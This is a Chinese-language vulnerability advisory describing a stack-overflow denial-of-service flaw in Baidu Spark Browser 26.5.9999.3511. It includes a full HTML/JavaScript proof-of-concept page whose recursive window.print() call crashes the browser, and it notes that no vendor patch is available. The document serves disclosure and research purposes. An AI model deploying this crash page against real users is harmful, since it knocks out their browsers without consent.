Baidu Spark浏览器栈溢出拒绝服务漏洞

发布日期:2014-03-10
更新日期:2014-07-02

受影响系统:
Baidu Spark Browser 26.5.9999.3511
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 68288
 
Baidu Spark浏览器是基于Chromium的Web浏览器。
 
Baidu Spark Browser 26.5.9999.3511及其他版本在实现上存在远程拒绝服务漏洞,成功利用后可允许攻击者使受影响浏览器崩溃,导致拒绝服务。
 
<*来源:Gjoko 'LiquidWorm' Krstic
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
 <title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>
 <body bgcolor="#50708C">
 <center>
 <p><font color="#e3e3e3">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>
 <button onClick=crash()>Execute!</button>
 </center>
 <script>
 function crash(){
  window.print();
  crash();
 }
 </script>
 </body>
 </html>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Baidu
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/2a38cc5460bfa17bebdfe848087c6ee6.html